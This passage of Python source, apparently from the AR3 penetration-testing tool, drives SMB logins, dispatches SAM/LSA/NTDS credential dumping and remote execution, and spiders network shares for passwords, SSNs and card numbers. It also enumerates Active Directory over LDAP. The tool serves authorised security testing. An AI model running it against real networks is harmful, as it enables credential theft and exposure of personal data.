    # WINRM only supports the 'test_execution' module.
    if args.exec_method.lower() == "winrm" and args.module != "test_execution":
        loggers['console'].warning([con.host, con.ip, args.module.upper(), "WINRM Cannot be used for module execution outside of 'test_execution'"])
        return
    try:
        module_class = get_module_class(args.module)
        class_obj = module_class()
        # Module Checks: Admin privs required and exec method used
        if class_obj.requires_admin and not con.admin:
            loggers['console'].fail([con.host, con.ip, args.module.upper(),"{} requires administrator access".format(args.module)])
            return
        elif class_obj.exec_methods and args.exec_method not in class_obj.exec_methods:
            loggers['console'].fail([con.host, con.ip, args.module.upper(), "Current execution method ({}) not supported".format(args.exec_method)])
            return
        # Parse '-o' key=value arguments into the module instance.
        populate_mod_args(class_obj, args.module_args, loggers['console'])
        loggers[args.mode].info("Module Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, args.module))
        class_obj.run(target, args, con, loggers, config_obj)
    except Exception as e:
        loggers['console'].fail([con.host, con.ip, args.module.upper(), "Error: {}".format(str(e))])
def host_enum(target, args, lockout, config_obj, db_obj, loggers):
    """Per-host driver: authenticate over SMB, then run every enumeration
    or execution action the user selected on the command line.

    Returns the list of shares discovered (empty list when login fails),
    which the caller feeds into the spider.  The SMB connection is always
    logged off / closed in the ``finally`` block.
    """
    # @TODO refactor
    try:
        try:
            con = smb_login(args, loggers, target, db_obj, lockout, config_obj)
        except Exception as e:
            # Connection-level failure: report in debug and skip this host.
            loggers['console'].debug([target, target, "ENUM", highlight(str(e), 'red')])
            return []
        shares = []
        if con.auth:
            # Sharefinder
            if args.share:
                # Explicit share list supplied: trust it without probing.
                shares = args.share.split(",")
                for share in shares:
                    loggers['console'].info([con.host, con.ip, "SHAREFINDER", "\\\\{}\\{}".format(con.host, share)])
            elif args.sharefinder or args.spider:
                shares = share_finder(con, args, loggers, target)
            # Secondary actions
            if args.passpol:
                password_policy(con, args, db_obj, loggers)
            if args.sam:
                extract_sam(con, args, target, loggers)
            if args.lsa:
                extract_lsa(con, args, target, loggers)
            if args.ntds:
                extract_ntds(con, args, target, loggers)
            if args.loggedon:
                loggedon_users(con, args, target, loggers)
            if args.sessions:
                active_sessions(con, args, target, loggers)
            if args.list_processes:
                tasklist(con, args, loggers)
            if args.list_services:
                list_services(con, args, loggers, target)
            if args.local_groups:
                get_netlocalgroups(con, args, target, loggers)
            if args.local_members:
                localgroup_members(con, args, target, loggers)
            if args.wmi_query:
                wmi_query(con, args, target, loggers)
            if args.execute:
                code_execution(con, args, target, loggers, config_obj, args.execute)
            if args.ps_execute:
                ps_execution(con, args, target, loggers, config_obj)
            if args.module:
                execute_module(con, args, target, loggers, config_obj)
        loggers['console'].debug("Shares returned for: {} {}".format(target, shares))
        return shares
    except KeyboardInterrupt:
        _exit(0)
    except Exception as e:
        loggers['console'].debug(str(e))
    finally:
        # Best-effort teardown; either call may fail if login never completed.
        try:
            con.con.logoff()
        except:
            pass
        try:
            con.close()
        except:
            pass
import os
import threading
from sys import exit
from time import sleep
from threading import Thread
from ar3.servers.smb import SMBServer
from ar3.ops.enum.spider import spider
from ar3.servers.http import ar3_server
from ar3.ops.enum.host_enum import host_enum
from ar3.helpers.misc import gen_random_string
from ar3.ops.enum.lockout_tracker import LockoutTracker
def requires_smb_server(func):
    """Decorator: only invoke *func* when ``options.fileless`` is set;
    otherwise skip the call and return False (no server is started)."""
    def wrapper(options, *args, **kwargs):
        if not options.fileless:
            return False
        return func(options, *args, **kwargs)
    return wrapper
def requires_http_server(func):
    """Decorator: only invoke *func* when ``options.fileless`` is set;
    otherwise skip the call and return False (no server is started)."""
    def wrapper(options, *args, **kwargs):
        if not options.fileless:
            return False
        return func(options, *args, **kwargs)
    return wrapper
@requires_smb_server
def smb_server_setup(options, logger):
    """Start the fileless SMB server on a randomly named hidden share.

    Only runs in --fileless mode (decorator gate).  The generated share
    name is stored on *options* so the exec classes can reference it.
    Returns the running SMBServer instance.
    """
    logger.debug('Starting AR3 SMB Server')
    share = '{}$'.format(gen_random_string(7))
    setattr(options, 'fileless_sharename', share)
    server = SMBServer(logger, share)
    server.start()
    return server
@requires_http_server
def http_server_setup(options, logger):
    """Launch the AR3 HTTP server in a background thread (fileless mode only)."""
    logger.debug('Starting AR3 HTTP Server')
    Thread(target=ar3_server, args=(logger,)).start()
def thread_launcher(target, args, lockout_obj, config_obj, db_obj, loggers):
    """Per-host worker: enumerate the host, then spider each returned share
    that is not blacklisted (or that the user explicitly requested)."""
    found_shares = host_enum(target, args, lockout_obj, config_obj, db_obj, loggers)
    if not args.spider:
        return
    for share_name in found_shares:
        if share_name not in config_obj.BLACKLIST_SHARE or args.share == share_name:
            spider(args, config_obj, loggers, db_obj, target, share_name)
def main(args, config_obj, db_obj, loggers):
    """Entry point for the enum op.

    Starts the optional fileless SMB/HTTP servers, fans out one daemon
    thread per target (bounded by ``args.max_threads``), waits for all
    workers, then shuts the servers down and hard-exits.

    Fixes vs. original:
      * ``Thread.isAlive()`` and ``threading.activeCount()`` were removed
        in Python 3.9 -- replaced with ``is_alive()``/``active_count()``.
      * the exception handler passed ``args.debug`` as the message argument
        to ``debug()``; every other call site passes a single message.
      * finished threads are now pruned with a rebuild instead of removing
        items from the list while iterating it (which skips elements).
    """
    lockout_obj = LockoutTracker(args, loggers)
    # Decorator-gated: each value is the server object in --fileless mode,
    # otherwise False.
    servers = { 'smb'  : smb_server_setup(args, loggers['console']),
                'http' : http_server_setup(args, loggers['console'])
                }
    active_threads = []
    for target in args.target:
        try:
            t = threading.Thread(target=thread_launcher, args=(target, args, lockout_obj, config_obj, db_obj, loggers,))
            t.daemon = True
            t.start()
            active_threads.append(t)
            # Throttle: block until we drop below the thread ceiling.
            while threading.active_count() > args.max_threads:
                sleep(0.001)
            # Prune finished workers without mutating the list mid-iteration.
            active_threads = [t for t in active_threads if t.is_alive()]
        except KeyboardInterrupt:
            print("\n[!] Key Event Detected, Closing...")
            exit(0)
        except Exception as e:
            loggers['console'].debug("Enum-Main: {}".format(str(e)))
    # Cleanup & Close: wait for the remaining workers to finish.
    while len(active_threads) > 0:
        active_threads = [t for t in active_threads if t.is_alive()]
        sleep(0.01)
    for server, obj in servers.items():
        if obj:
            obj.cleanup_server()
    os._exit(0)  # Only real way found to shutdown server
import threading
from ar3.core.smb import SmbCon
class SearchThread(threading.Thread):
    ''' Recursively scan directories, adding
    files to queue to be parsed for data'''
    def __init__(self, args, config, loggers, db, target, share):
        threading.Thread.__init__(self)
        # Consumed by spider(): dicts describing candidate files to parse.
        self.file_queue = []
        self.timeout = args.timeout
        self.target = target
        self.share = share
        # Recursion depth limit, measured in '/' separators of the path.
        self.max_depth = args.max_depth
        self.start_path = args.start_path
        # Config-driven filters: extensions to parse, directories to skip.
        self.whitelist_ext = config.WHITELIST_EXT
        self.blacklist_dir = config.BLACKLIST_DIR
        self.loggers = loggers
        # Dedicated SMB connection for this walk (closed in run()).
        self.smbcon = SmbCon(args, loggers, target, db)
        self.smbcon.create_smb_con()
        # Show kickoff messages on startup, if not args.spider startup is called from a module
        if args.spider:
            loggers['console'].info([self.smbcon.host, self.smbcon.ip, "SPIDER", "Scanning \\\\{}\\{}{}".format(target, share, args.start_path.replace("/", "\\"))])
            loggers['spider'].info("Spider\t\\\\{}\\{}{}".format(target, share, args.start_path.replace("/", "\\")))
    def run(self):
        """Walk the share from start_path, then tear down the SMB connection."""
        self.recursion(self.start_path)
        self.smbcon.close()
        del self.smbcon
    def recursion(self, path):
        """Depth-first walk of *path*, appending whitelisted files to
        file_queue and recursing into non-blacklisted directories up to
        max_depth.  All SMB errors are swallowed (best-effort crawl).
        """
        try:
            for x in self.smbcon.list_path(self.share, path+"*"):
                #encoding depending on SMBv1 con or not
                try:
                    filename = x.get_longname().decode('UTF-8')
                except:
                    filename = x.get_longname()
                # Quick fix for gpp passwords on 2019 DC's @TODO create perm fix
                if filename.lower() == "groups":
                    filename = "Groups.xml"
                if filename not in ['.','..']:
                    # If DIR, use recursion to keep searching until max depth hit
                    if x.is_directory() and path.count("/") <= self.max_depth:
                        full_path = path + filename + "/"
                        # Verify not on blacklist
                        if full_path not in self.blacklist_dir:
                            self.loggers['console'].debug("Spider-DIR: {}".format(full_path))
                            self.recursion(full_path)
                    # Check for valid file ext before adding to queue
                    elif filename.split('.')[-1].lower() in self.whitelist_ext:
                        #else add to file queue to be scanned
                        tmp = {
                            'ip'       : self.smbcon.ip,
                            'host'     : self.smbcon.host,
                            'share'    : self.share,
                            'path'     : path,
                            'filename' : filename
                            }
                        self.loggers['console'].debug("Spider-File: {}".format(tmp['filename']))
                        self.file_queue.append(tmp)
                        del tmp
        except:
            # Unreadable directories/paths are silently skipped by design.
            pass
import threading
from os import _exit
from time import sleep
from datetime import datetime, timedelta
from ar3.ops.enum.file_parser import ParserThread
from ar3.ops.enum.spider.file_search import SearchThread
def spider(args, config_obj, loggers, db_obj, target, share):
    """Crawl *share* on *target* for candidate files, then parse each one
    for sensitive data.

    A single SearchThread walks the share and fills its ``file_queue``;
    this function drains the queue by spawning one ParserThread per file,
    enforcing both the global thread cap (``args.max_threads``) and a
    per-file parse timeout (``config_obj.PARSE_TIMEOUT``).

    Fix vs. original: ``Thread.isAlive()`` and ``threading.activeCount()``
    were removed in Python 3.9 -- replaced with ``is_alive()`` and
    ``active_count()``.
    """
    search_thread = SearchThread(args, config_obj, loggers, db_obj, target, share)
    search_thread.daemon = True
    search_thread.start()
    # Give the searcher a head start so the queue has entries to drain.
    sleep(args.timeout)

    # Launch ParserThread class to discovery data in files
    active_threads = []
    while search_thread.file_queue:
        try:
            d = {}
            d['start_time'] = datetime.now()
            d['thread'] = ParserThread(config_obj, db_obj, args, loggers, search_thread.file_queue[0])
            d['thread'].daemon = True
            d['thread'].start()
            search_thread.file_queue.pop(0)
            active_threads.append(d)

            # Check for thread timeout in search threads and send stop signal
            for th in reversed(active_threads):
                if th['thread'].is_alive() and datetime.now() > th['start_time'] + timedelta(seconds=config_obj.PARSE_TIMEOUT):
                    th['thread'].stop()
                    active_threads.remove(th)

            # Wait while max threads are active or SearchThread is still active
            while threading.active_count() >= args.max_threads or search_thread.is_alive():
                # break if there are new file to parse
                if search_thread.file_queue and threading.active_count() < args.max_threads:
                    break
                sleep(0.05)
        except KeyboardInterrupt:
            print("\n[!] Key Event Detected, Closing...")
            _exit(0)
        except Exception as e:
            loggers['console'].debug("\\\\{}\\{}\\\tFile_Search:{}".format(target, share, str(e)))

    # Wait for threads to close and cleanup after each share
    while threading.active_count() > 2:
        for th in reversed(active_threads):
            if th['thread'].is_alive() and datetime.now() > th['start_time'] + timedelta(seconds=config_obj.PARSE_TIMEOUT):
                th['thread'].stop()
                active_threads.remove(th)
        sleep(0.05)
    del active_threads
    del search_thread
    return
import threading
from impacket.smb3structs import FILE_READ_DATA
from ar3.core.smb import SmbCon
from ar3.pysmb.smb import smb_connect
from ar3.helpers.remotefile import RemoteFile
from ar3.ops.enum.file_parser.parse_docx import parse_docx
from ar3.ops.enum.file_parser.parse_xlsx import parse_xlsx
from ar3.ops.enum.file_parser.parse_regex import parse_data
class ParserThread(threading.Thread):
    '''Parse file contents, on valid match returns dict:
    {
    'Parser': 'Regex',
    'ParserDetails': 'SSN',
    'LineCount': '39',
    'LineSample': 'SSN:xxx-xx-xxxx'
    }'''
    def __init__(self, config, db, args, loggers, file_data):
        threading.Thread.__init__(self)
        # Create SMB connection to parse file
        self.args = args
        self.loggers = loggers
        self.db = db
        self.logger = loggers['console']
        self.filer = loggers['spider']    # dedicated spider results log
        self.debug = args.debug
        self.timeout = args.timeout
        self._running = True              # cleared by stop() to abort parse()
        self.user = args.user
        self.passwd = args.passwd
        self.hash = args.hash
        self.domain = args.domain
        self.local_auth = args.local_auth

        # Unpack data from search_thread queue
        self.ip = file_data['ip']
        self.host = file_data['host']
        self.share = file_data['share']
        self.path = file_data['path']
        self.filename = file_data['filename']

        # Unpack configs
        self.filename_only = args.filename_only
        self.regex = config.REGEX
        self.keywords = config.KEY_WORDS
        self.ext = config.KEY_EXT
        self.xlsx_keywords = config.XLSX_HEADERS
        # BUG FIX: these two assignments were swapped. max_size caps the number
        # of bytes read from a remote file (reader.read(self.max_size)), so it
        # must come from MAX_FILE_SIZE; max_chars caps the characters inspected
        # per line in parse_regex.regex_search, so it must come from MAX_CHAR.
        self.max_size = config.MAX_FILE_SIZE
        self.max_chars = config.MAX_CHAR

        self.logger.debug("ParserThread Init: \\\\{}\\{}{}{}".format(self.ip, self.share, self.path.replace("/", "\\"), self.filename))

    def run(self):
        """Thread entry point: parse the queued file, logging any failure."""
        try:
            self.parse(self.ip, self.share, self.path, self.filename)
            return
        except Exception as e:
            self.logger.debug("ParserThread Err: \\\\{}\\{}{}{}\tFileParser:{}".format(self.ip, self.share, self.path.replace("/", "\\"), self.filename, str(e)))

    def stop(self):
        # Signal parse() to stop (checked by the while-loop guard)
        self._running = False

    def parse(self, server, share, path, filename):
        """Inspect a single file; report the first hit found, then return."""
        while self._running:
            # File Extension
            ext = file_extension(filename)
            if ext in self.ext:
                self.reporter('Extension', ext,'', '')
                return

            # Key Word in filename
            keyword = self.keyword_search(filename)
            if keyword in self.keywords:
                self.reporter('Keyword', keyword, '', '')
                return

            # Parse File Contents
            if not self.filename_only:
                ## Parse Excel (Uses pysmb, not hash auth)
                if ext == 'xlsx' and not self.hash:
                    # Create SMB connection using pysmb
                    con = smb_connect(server, self.user, self.passwd, self.domain, self.timeout)
                    result = parse_xlsx(self.xlsx_keywords, self.regex, self.max_size, self.max_chars, self.timeout, con, share, path, filename)
                    if result:
                        self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])
                        con.close()
                        return
                    con.close()

                ## Parse Word Docs (Uses pysmb, not hash auth)
                elif ext == 'docx' and not self.hash:
                    # Create SMB connection using pysmb
                    con = smb_connect(server, self.user, self.passwd, self.domain, self.timeout)
                    result = parse_docx(self.regex, self.max_chars, self.max_size, self.timeout, con, share, path, filename)
                    if result:
                        self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])
                        con.close()
                        return
                    con.close()

                ## Parse All other file types
                else:
                    # Create SMB connection using Impacket
                    smb_obj = SmbCon(self.args, self.loggers, server, self.db)
                    smb_obj.create_smb_con()
                    try:
                        reader = RemoteFile(smb_obj.con, path + filename, share, access=FILE_READ_DATA)
                        reader.open()
                        contents = reader.read(self.max_size)
                    except:
                        self.logger.debug("Failed to open file: {}".format(path + filename))
                        return

                    # Pass Contents to parser
                    result = parse_data(contents, self.regex, self.max_chars, filename)
                    if result:
                        self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])

                    # Close open reader object
                    reader.close()
                    del (reader)
                    smb_obj.close()
            return

    def keyword_search(self, filename):
        """Return the first configured keyword found in filename, else False."""
        #Search for keywords in filename
        for word in self.keywords:
            if word in filename.lower():
                return word
        return False

    def reporter(self, search, search_detail, line_num, line_detail):
        """Log a spider hit to the spider log and the console."""
        full_path = "\\\\" + self.host + "\\" + self.share + self.path.replace("/", "\\") + self.filename
        # Used for gpp_password module & decryption:
        if search_detail == 'gpp_password':
            from ar3.modules.gpp_password import cpassword_parser
            cpassword_parser(self.loggers, self.host, self.ip, full_path, line_detail)
        # Write spider results to terminal and log
        else:
            self.filer.info("Spider\t{}\t{}\t{}".format(search, full_path, line_detail))
            line = "{:<10} : {}".format(search, full_path)
            if line_num:
                line += " (Line: {})".format(line_num)
            self.logger.success([self.host, self.ip, "SPIDER", line])
            if line_detail:
                self.logger.success([self.host, self.ip, "SPIDER", "{:<10} : {}".format("Details", line_detail.strip())])
def file_extension(filename):
    """Return the lowercase text after the final dot of *filename*.

    A name with no dot comes back whole (lowercased); any failure
    (e.g. a non-string argument) yields None.
    """
    try:
        return filename.rsplit('.', 1)[-1].lower()
    except:
        return
from re import findall
def parse_data(contents, regex, max_chars, filename):
    """Scan file contents line by line for configured regex hits.

    Returns the first match dict produced by regex_search() (keys: Parser,
    ParserDetails, LineCount, LineSample), or False when nothing matches.
    """
    # Get file data
    line_count = 1          # 1-based line number reported as 'LineCount'
    # Splitlines and look for regex matches
    for line in contents.splitlines():
        if line:
            # Parse line for sensitive information
            search_data = regex_search(regex, max_chars, line, line_count, filename)
            if search_data:
                # Return on first found match in file
                return search_data
        line_count += 1
    # Close & return on no match
    return False
def regex_search(regex, max_chars, line, line_count, filename):
    """Match one line against every configured regex pattern.

    *line* may be bytes (decoded as UTF-8 when possible) or str; it is
    truncated to max_chars before matching. Returns a result dict on the
    first positive match, or False otherwise.
    """
    # Function called by various modules to identify regex patterns from text
    try:
        line = line[:max_chars].decode('UTF-8')
    except:
        # Already str, or undecodable bytes: match on the raw slice
        line = line[:max_chars]

    # Begin regex lookup
    for key, value in regex.items():
        try:
            for x in findall(value, line):
                # Skip credit card lookup for pdf files (false positives)
                if key == 'Credit Card' and filename.endswith('pdf'):
                    pass
                # A Luhn checksum of 0 means a plausible card number;
                # anything else is discarded as a false positive
                elif key == 'Credit Card' and luhn_checksum(x) != 0:
                    pass
                else:
                    # return after one positive match in line
                    return { 'Parser': 'Regex',
                             'ParserDetails': key,
                             'LineCount': line_count,
                             'LineSample': """{}""".format(x)}
        except Exception as e:
            # Mixed str pattern vs bytes line: give up on this line entirely
            if "bytes-like object" in str(e):
                return False
    return False
def luhn_checksum(card_number):
    """Luhn check digit computation; 0 means a valid card number.

    Src: https://stackoverflow.com/questions/21079439/implementation-of-luhn-formula
    """
    digits = [int(c) for c in str(card_number)]
    # Digits in odd positions (from the right) are summed as-is
    total = sum(digits[-1::-2])
    # Digits in even positions are doubled, then their digit sums added
    for d in digits[-2::-2]:
        total += sum(int(c) for c in str(d * 2))
    return total % 10
import argparse
from os import path
from getpass import getpass
def file_exists(parser, filename):
    """Validate that *filename* exists and return its stripped lines.

    Calls parser.error() (which exits) when the file is missing.
    BUG FIX: the file handle was previously opened without being closed;
    use a context manager so it is always released.
    """
    if not path.exists(filename):
        parser.error("Input file not found: {}".format(filename))
    with open(filename) as infile:
        return [x.strip() for x in infile]
def query_args(sub_parser):
    """Register the 'query' sub-command and all of its options.

    Groups: connection settings, query types, query options, authentication,
    and output formatting. One hidden arg keeps execution helpers happy.
    """
    query_parser = sub_parser.add_parser("query", help='- Perform LDAP queries on domain')

    # Connection options
    query_parser.add_argument('-t', dest='timeout', type=int, default=3, help='Connection Timeout')
    query_parser.add_argument('-srv', '--ldap-srv', dest='ldap_srv', type=str, default='', help='LDAP Server')

    qtypes = query_parser.add_argument_group("Query Types")
    qtypes.add_argument('--users', dest="users", action='store_true', help="Query domain users")
    qtypes.add_argument('--groups', dest="groups", action='store_true', help="Query domain groups")
    qtypes.add_argument('--computers', dest="computers", action='store_true', help="Query domain computers")
    qtypes.add_argument('--domain', dest="qdomain", action='store_true', help="Query domain information")
    qtypes.add_argument('--trust', dest="trust", action='store_true', help="Enumerate domain trust relationships")
    qtypes.add_argument('--reversible-encryption', dest="reversible_encryption", action='store_true', help="Lookup users with reversible encryption")
    qtypes.add_argument('--pass-never-expire', dest="pass_never_expire", action='store_true',help="Lookup users whos password never expires")
    qtypes.add_argument('--pass-not-required', dest="pass_not_required", action='store_true',help="Lookup users with password not required")
    qtypes.add_argument('--recon', dest="recon", action='store_true',help="Perform recon on the domain and populates the AR3 database for enumeration")
    qtypes.add_argument('--custom', dest="custom", type=str, default='', help="Perform custom query")

    qoptions = query_parser.add_argument_group("Query Options")
    qoptions.add_argument('-q', '--query', dest='query', type=str, default='', help='Specify user, computer, or group to query')
    qoptions.add_argument('-a', dest='attrs', type=str, default='', help='Specify attrs to query')
    qoptions.add_argument('--all', dest='all', action='store_true', help='Enumerate all users (even disabled) or all groups & members')

    auth = query_parser.add_argument_group("Query Authentication")
    auth.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for queries')
    auth.add_argument('-u', dest='user', type=str, default='', required=False, help='Set username (Default=null)')
    auth.add_argument('-d', dest='domain', type=str, default='', help='Domain Name')
    # Password and hash are mutually exclusive authentication mechanisms
    query_pwd = auth.add_mutually_exclusive_group(required=False)
    query_pwd.add_argument('-H','-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
    query_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')

    outdata = query_parser.add_argument_group("Output Options")
    outdata.add_argument('-v','--verbose', dest="verbose", action='store_true', help="Show attribute fields and values")
    outdata.add_argument('--data-only', dest="data_only", action='store_true', help="Show data only (Copy/Paste Format)")
    outdata.add_argument('--parse', dest="parse", action='store_true', help="Parse text fields for sensitive information")

    # Hidden Args: Required for execution methods to work but not applicable to the operational mode
    query_parser.add_argument('--local-auth', dest="local_auth", action='store_true', help=argparse.SUPPRESS)
def parse_attrs(attrs):
    """Split a comma-separated attribute string into a list ('' -> [])."""
    return attrs.split(",") if attrs else []
def query_arg_mods(args, db_obj, loggers):
    """Normalize parsed 'query' arguments before execution.

    Splits the attrs string, resolves credentials (prompt, hash, or the AR3
    credential database via -id), and prints the authentication summary.
    Returns the modified args namespace.
    """
    logger = loggers['console']
    args.attrs = parse_attrs(args.attrs)

    if args.hash:
        # BUG FIX: args.passwd is a str; the old code called
        # args.passwd.append(False) which raised AttributeError whenever a
        # hash was supplied. Mark the password unused instead.
        args.passwd = False
    elif not args.passwd and args.user:
        # Keep passwd a plain string, consistent with the cred-id path below
        # (previously this branch stored a one-element list).
        args.passwd = getpass("Enter password, or continue with null-value: ")

    if args.cred_id and not args.user:
        enum_user = db_obj.extract_user(args.cred_id)
        if enum_user:
            args.user = enum_user[0][0]
            args.passwd = enum_user[0][1]
            args.hash = enum_user[0][2]
            args.domain = enum_user[0][3]
        else:
            logger.fail("Unable to gather credentials from db, try again")
            exit(1)

    if args.hash:
        logger.status(['Query Authentication', '{}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
    else:
        logger.status(['Query Authentication', '{}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
    return args
from dns.resolver import Resolver
from ar3.core.ldap import LdapCon
from ar3.core.ldap.query import QUERIES, ATTRIBUTES, UAC_LOOKUP
def resolve_host(host, dns_server):
    """Resolve *host* to an address via *dns_server*.

    Returns the first A record answer object, or '' on any failure.
    """
    # Reuses ldap_srv value to resolve dns names (Assumes this is a DC)
    try:
        res = Resolver()
        res.timeout = 3
        res.lifetime = 3
        res.nameservers = [dns_server]
        dns_query = res.query(host, "A")
        for ip in dns_query:
            # Only the first answer is used
            return ip
    except KeyboardInterrupt:
        exit(0)
    except:
        pass
    return ''
def attribute_parser(logger, host, ip, key, attribute, data, title="PARSER"):
    """Flag LDAP text fields that look credential-related.

    Logs one success line per sensitive term found in *data* (a value may
    trigger multiple terms, e.g. 'password' also contains 'pass').
    """
    SENSITIVE_TERMS = ['password', 'key', 'login', 'logon', 'pass']
    lowered = data.lower()
    for term in SENSITIVE_TERMS:
        if term in lowered:
            logger.success([host, ip, title.upper(), '{:<10} Attribute: {:<15} Value: \"{}\"'.format(key, attribute, data)])
#########################
# USERS
#########################
def user_query(args, query, loggers, db_obj, user_lookup=False):
    """Enumerate domain users over LDAP, record them in the AR3 db, and
    hand each record to user_handler for display."""
    resp = query.user_query(user_lookup, args.attrs, all_users=args.all)
    for key, data in resp.items():
        try:
            # Strip stray quote characters the LDAP layer can leave in names
            data['sAMAccountName'] = data['sAMAccountName'].replace("\'", '')
            db_obj.update_username(args.domain, data['sAMAccountName'])
            user_handler(args, loggers['console'], query.host, query.ip, data['sAMAccountName'], data)
        except Exception as e:
            loggers['console'].warning(["Query Error {}".format(key), str(e)])
def user_handler(args, logger, host, ip, user, data):
    """Display one user record: name-only, name per line (copy/paste mode),
    or one line per attribute when verbose or a specific query was made."""
    if args.data_only:
        logger.output(user)
        return
    for attribute, value in data.items():
        if args.parse and attribute.lower() in ['info','comment','description']:
            attribute_parser(logger, host, ip, user, attribute, value)
        # UserAccountControl Lookup
        if attribute == 'userAccountControl':
            if value in UAC_LOOKUP.keys():
                value = "{} ({})".format(UAC_LOOKUP[value], value)
        if (args.verbose) or (args.query):
            logger.info([host, ip, "USERS", "{:<20} {:<24} : {}".format(user, attribute, value)])
        else:
            # Non-verbose: one summary line per user, then stop
            logger.info([host, ip, "USERS", user])
            return
#########################
# GROUPS
#########################
def group_query_all(args, query, loggers, db_obj):
    # Enumerate all groups and users on the domain
    # NOTE: unlike the other *_query helpers this takes the LDAPHandler
    # wrapper (query.con is the live connection), matching its callers.
    for group in query.con.group_query([]).keys():
        group_query(args, query.con, loggers, db_obj, group_lookup=group)
def group_query(args, query, loggers, db_obj, group_lookup=False):
    """Enumerate domain groups, or members of one group when group_lookup
    is set; results are mirrored into the AR3 database."""
    # Enum groups or lookup members of a single group
    if group_lookup:
        resp = query.group_membership(group_lookup, args.attrs)
        if resp:
            db_obj.update_group(group_lookup, args.domain)
        for key, data in resp.items():
            key = key.replace("\'", '')
            try:
                # Presence of userAccountControl distinguishes a user member
                # from a nested group member
                if 'userAccountControl' in data.keys():
                    db_obj.update_username(args.domain, key)
                    db_obj.update_user_members(args.domain, key, group_lookup)
                    group_membership_handler(args, loggers['console'], query.host, query.ip, key, data, group_lookup)
                else:
                    db_obj.update_group(key, args.domain)
                    db_obj.update_group_members(args.domain, key, group_lookup)
                    group_membership_handler(args, loggers['console'], query.host, query.ip, key, data, group_lookup, title='MEMBER: GROUP')
            except Exception as e:
                loggers['console'].warning(["Query Error {}".format(key), str(e)])
    else:
        resp = query.group_query(args.attrs)
        for key, data in resp.items():
            try:
                key = key.replace("\'", '')
                db_obj.update_group(key, args.domain)
                group_handler(args, loggers['console'], query.host, query.ip, key, data)
            except Exception as e:
                loggers['console'].warning(["Query Error {}".format(key), str(e)])
def group_handler(args, logger, host, ip, key, data):
    """Display one group record (name-only, summary line, or per-attribute
    lines when verbose)."""
    if args.data_only:
        logger.output(key)
        return
    for attribute, value in data.items():
        if args.parse and attribute.lower() in ['info', 'comment', 'description']:
            attribute_parser(logger, host, ip, key, attribute, value)
        if args.verbose:
            logger.info([host, ip, "GROUPS", "{:<40} {:<25} : {}".format(key, attribute, value)])
        else:
            # Non-verbose: one line with description when present, then stop
            try:
                logger.info([host, ip, "GROUPS", key, data['description']])
            except:
                logger.info([host, ip, "GROUPS", key])
            return
def group_membership_handler(args, logger, host, ip, user, data, group, title='MEMBER: USER'):
    """Display one group member (user or nested group, per *title*)."""
    if args.data_only:
        logger.output(user)
        return
    for attribute, value in data.items():
        if args.parse and attribute.lower() in ['info', 'comment', 'description']:
            attribute_parser(logger, host, ip, user, attribute, value)
        if args.verbose:
            logger.info([host, ip, title, "{:<40} {:<25} {:<20} : {}".format(group, user, attribute, value)])
        else:
            # Non-verbose: one "group  member" line, then stop
            logger.info([host, ip, title, "{:<40} {}".format(group, user)])
            return
#########################
# COMPUTERS
#########################
def computer_query(args, query, loggers, db_obj):
    """Enumerate domain computers and hand each record to computer_handler."""
    resp = query.computer_query(args.query, args.attrs)
    for key, data in resp.items():
        try:
            computer_handler(args, loggers['console'], query.host, query.ip, key, data, db_obj)
        except Exception as e:
            loggers['console'].warning(["Query Error {}".format(key), str(e)])
def computer_handler(args, logger, host, ip, key, data, db_obj):
    """Display one computer record, resolving its IP through the DC's DNS
    and mirroring the host into the AR3 database."""
    if args.data_only:
        logger.output(key)
        return
    resolve = resolve_host(key, ip)
    try:
        db_obj.update_host_ldap(key, resolve, args.domain, data['operatingSystem'])
    except:
        # Record may lack an operatingSystem attribute
        db_obj.update_host_ldap(key, resolve, args.domain, '')
    for attribute, value in data.items():
        if args.parse and attribute.lower() in ['info','comment','description']:
            attribute_parser(logger, host, ip, key, attribute, value)
        if args.verbose:
            logger.info([host, ip, "COMPUTERS", "{:<35} {:<24} : {:<40} {}".format(key, attribute, value, resolve)])
        elif args.query == 'eol':
            # End-of-life view: OS + service pack summary, one line per host
            logger.info([host, ip, "COMPUTERS","{:<35} {} {:<40} {}".format(key, data['operatingSystem'],data['operatingSystemServicePack'], resolve)])
            return
        else:
            logger.info([host, ip, "COMPUTERS", key, resolve])
            return
#########################
# DOMAIN
#########################
def domain_query(args, query, loggers, db_obj):
    """Query domain-level objects and hand each record to domain_handler."""
    resp = query.domain_query(args.attrs)
    for key, data in resp.items():
        domain_handler(args, loggers['console'], query.host, query.ip, key, data, db_obj)
def domain_handler(args, logger, host, ip, key, data, db_obj):
    """Display one domain record and mirror its password policy into the
    AR3 database."""
    if args.data_only:
        logger.output(key)
        return
    try:
        db_obj.update_domain_ldap(args.domain, data['lockoutThreshold'], data['lockoutDuration'], data['minPwdLength'], data['maxPwdAge'])
    except:
        # Fall back to the minimal update when policy attrs are missing
        db_obj.update_domain(args.domain, data['lockoutThreshold'])
    for attribute, value in data.items():
        logger.info([host, ip, "DOMAIN", "{:<20} {:<24} : {}".format(key, attribute, value)])
#########################
# TRUSTS
#########################
def trust_query(args, query, loggers, db_obj):
    """Enumerate domain trust relationships and display each via
    trust_handler."""
    resp = query.trust_query(args.attrs)
    for key, data in resp.items():
        trust_handler(args, loggers['console'], query.host, query.ip, key, data)
def trust_handler(args, logger, host, ip, key, data):
    """Report a single trust-relationship record.

    In data-only mode only the trust name is emitted; otherwise every
    attribute is printed on its own formatted line.
    """
    if args.data_only:
        logger.output(key)
        return
    for attr_name, attr_value in data.items():
        line = "{:<20} {:<24} : {}".format(key, attr_name, attr_value)
        logger.info([host, ip, "TRUST", line])
#########################
# CUSTOM
#########################
def custom_query(args, cust_query, cust_attr, query_obj, loggers, db_obj, title='CUSTOM'):
    """Run an arbitrary LDAP filter (user-supplied or one of the canned
    QUERIES) and display each record via custom_handler."""
    resp = query_obj.custom_query(cust_query, cust_attr)
    for key, data in resp.items():
        custom_handler(args, loggers['console'], query_obj.host, query_obj.ip, key, data, title)
